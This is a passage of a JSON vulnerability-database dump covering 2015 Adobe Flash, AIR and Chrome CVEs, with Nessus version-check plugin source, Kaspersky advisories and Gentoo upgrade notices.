A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "edition": 26, "published": "2015-06-12T00:00:00", "title": "Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/84156", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84156);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n 
\"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe AIR <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nWindows host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. 
(CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '17.0.0.144';\nfix = '17.0.0.172';\nfix_ui = '17.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:30:18", "description": "The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. 
A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exist that\n allow an attacker to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. 
(CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 26, "published": "2015-05-12T00:00:00", "title": "Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_42_0_2311_152.NASL", "href": "https://www.tenable.com/plugins/nessus/83368", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83368);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-3044\",\n \"CVE-2015-3077\",\n \"CVE-2015-3078\",\n \"CVE-2015-3079\",\n \"CVE-2015-3080\",\n \"CVE-2015-3082\",\n \"CVE-2015-3083\",\n \"CVE-2015-3084\",\n \"CVE-2015-3085\",\n \"CVE-2015-3086\",\n \"CVE-2015-3087\",\n \"CVE-2015-3088\",\n \"CVE-2015-3089\",\n \"CVE-2015-3090\",\n \"CVE-2015-3091\",\n \"CVE-2015-3092\",\n \"CVE-2015-3093\"\n );\n script_bugtraq_id(\n 74605,\n 74608,\n 74609,\n 74610,\n 74612,\n 74614,\n 74616,\n 74617\n );\n\n script_name(english:\"Google Chrome < 42.0.2311.152 Multiple Vulnerabilities (Mac OS X)\");\n script_summary(english:\"Checks the version number of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host contains a web browser that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Mac OS X host is\nprior to 42.0.2311.152. 
It is, therefore, affected by multiple\nvulnerabilities related to Adobe Flash :\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose sensitive information.\n (CVE-2015-3044)\n\n - Multiple unspecified type confusion flaws exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-3077, CVE-2015-3084, CVE-2015-3086)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-3078, CVE-2015-3089, CVE-2015-3090,\n CVE-2015-3093)\n\n - An unspecified security bypass exists that allows a\n context-dependent attacker to disclose sensitive\n information. (CVE-2015-3079)\n\n - An unspecified use-after-free error exists that allows\n an attacker to execute arbitrary code. (CVE-2015-3080)\n\n - Multiple validation bypass vulnerabilities exists that\n allow an attacker to lead to write arbitrary data to the\n file system. (CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3085)\n\n - An integer overflow condition exists due to improper\n validation of user-supplied input. This allows a\n context-dependent attacker to execute arbitrary code.\n (CVE-2015-3087)\n\n - A heap-based buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-3088)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. 
(CVE-2015-3091,\n CVE-2015-3092)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # http://googlechromereleases.blogspot.com/2015/05/stable-channel-update.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7417f6c2\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome 42.0.2311.152 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3093\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ShaderJob Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'42.0.2311.152', severity:SECURITY_HOLE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:42:46", "bulletinFamily": "info", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "### *Detect date*:\n04/14/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMemory corruption, buffer overflow, use-after-free, double free and memory leak vulnerabilities were found in Adobe Flash. By exploiting these vulnerabilities malicious users can bypass security restrictions, execute arbitrary code or obtain sensitive information. 
These vulnerabilities can be exploited remotely via unknown vectors.\n\n### *Affected products*:\nAdobe Flash Player for Linux versions earlier than 11.2.202.457 \nAdobe Flash Player versions earlier than 17.0.0.169 \nAdobe Flash Player Extended Support versions earlier than 13.0.0.281\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get2.adobe.com/flashplayer/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-06.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-0354](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354>)10.0Critical \n[CVE-2015-0355](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355>)10.0Critical \n[CVE-2015-0352](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352>)10.0Critical \n[CVE-2015-0353](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353>)10.0Critical \n[CVE-2015-0350](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350>)10.0Critical \n[CVE-2015-0351](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351>)10.0Critical \n[CVE-2015-0348](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348>)10.0Critical \n[CVE-2015-0349](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349>)10.0Critical \n[CVE-2015-0346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346>)10.0Critical \n[CVE-2015-0347](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347>)10.0Critical \n[CVE-2015-0357](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357>)5.0Critical \n[CVE-2015-0356](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356>)10.0Critical \n[CVE-2015-0359](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359>)10.0Critical 
\n[CVE-2015-0358](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358>)10.0Critical \n[CVE-2015-0360](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360>)10.0Critical \n[CVE-2015-3038](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038>)10.0Critical \n[CVE-2015-3039](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039>)10.0Critical \n[CVE-2015-3042](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042>)10.0Critical \n[CVE-2015-3043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043>)10.0Critical \n[CVE-2015-3040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040>)5.0Critical \n[CVE-2015-3041](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041>)10.0Critical \n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-04-14T00:00:00", "id": "KLA10547", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10547", "title": "\r KLA10547Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T11:42:03", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Adobe products. 
Malicious users can exploit these vulnerabilities to write local files, bypass security restrictions, execute arbitrary code or obtain sensitive information.\n\n### *Affected products*:\nAdobe Flash Player versions earlier than 17.0.0.188 for OS X and Windows \nAdobe Flash Player ESR versions earlier than 13.0.0.289 \nAdobe Flash Player versions earlier than 11.2.202.460 for Linux \nAdobe AIR runtime, SDK and Compiler versions earlier than 17.0.0.172\n\n### *Solution*:\nUpdate to the latest version \n[Get Flash Player](<https://get.adobe.com/flashplayer/>) \n[Get AIR](<https://get.adobe.com/air/>)\n\n### *Original advisories*:\n[Adobe bulletin](<https://helpx.adobe.com/security/products/flash-player/apsb15-09.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe Flash Player ActiveX](<https://threats.kaspersky.com/en/product/Adobe-Flash-Player-ActiveX/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical 
\n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High \n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 41, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10574", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10574", "title": "\r KLA10574Multiple vulnerabilities in Adobe Flash Player ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-02T12:00:17", "bulletinFamily": "info", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### *Detect date*:\n05/12/2015\n\n### *Severity*:\nCritical\n\n### *Description*:\nGoogle Chrome was updated to address vulnerabilities in Flash Player. For details look at KLA10574.\n\n### *Affected products*:\nGoogle Chrome versions earlier than 42.0.2311.152\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. 
Contact the vendor for further deletion instructions, or ignore alerts of this kind at your own risk. \n[Get Google Chrome](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Google blog record](<http://googlechromereleases.blogspot.ru/2015/05/stable-channel-update.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed:+GoogleChromeReleases+\\(Google+Chrome+Releases\\)>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2015-3044](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044>)5.0Critical \n[CVE-2015-3089](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3089>)10.0Critical \n[CVE-2015-3088](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3088>)10.0Critical \n[CVE-2015-3084](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3084>)10.0Critical \n[CVE-2015-3086](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3086>)10.0Critical \n[CVE-2015-3091](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3091>)5.0Critical \n[CVE-2015-3078](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3078>)10.0Critical \n[CVE-2015-3079](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3079>)5.0Critical \n[CVE-2015-3080](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3080>)10.0Critical \n[CVE-2015-3081](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3081>)4.3Warning \n[CVE-2015-3092](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3092>)5.0Critical \n[CVE-2015-3090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3090>)10.0Critical \n[CVE-2015-3087](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3087>)10.0Critical \n[CVE-2015-3077](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3077>)10.0Critical \n[CVE-2015-3085](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3085>)6.4High 
\n[CVE-2015-3083](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3083>)6.4High \n[CVE-2015-3082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3082>)6.4High \n[CVE-2015-3093](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3093>)10.0Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 43, "modified": "2020-06-18T00:00:00", "published": "2015-05-12T00:00:00", "id": "KLA10576", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10576", "title": "\r KLA10576Flash Player update for Google Chrome ", "type": "kaspersky", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:05", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-plugins/adobe-flash-11.2.202.457\"", "edition": 1, "modified": "2015-04-17T00:00:00", "published": "2015-04-17T00:00:00", "id": "GLSA-201504-07", "href": "https://security.gentoo.org/glsa/201504-07", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:15", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. 
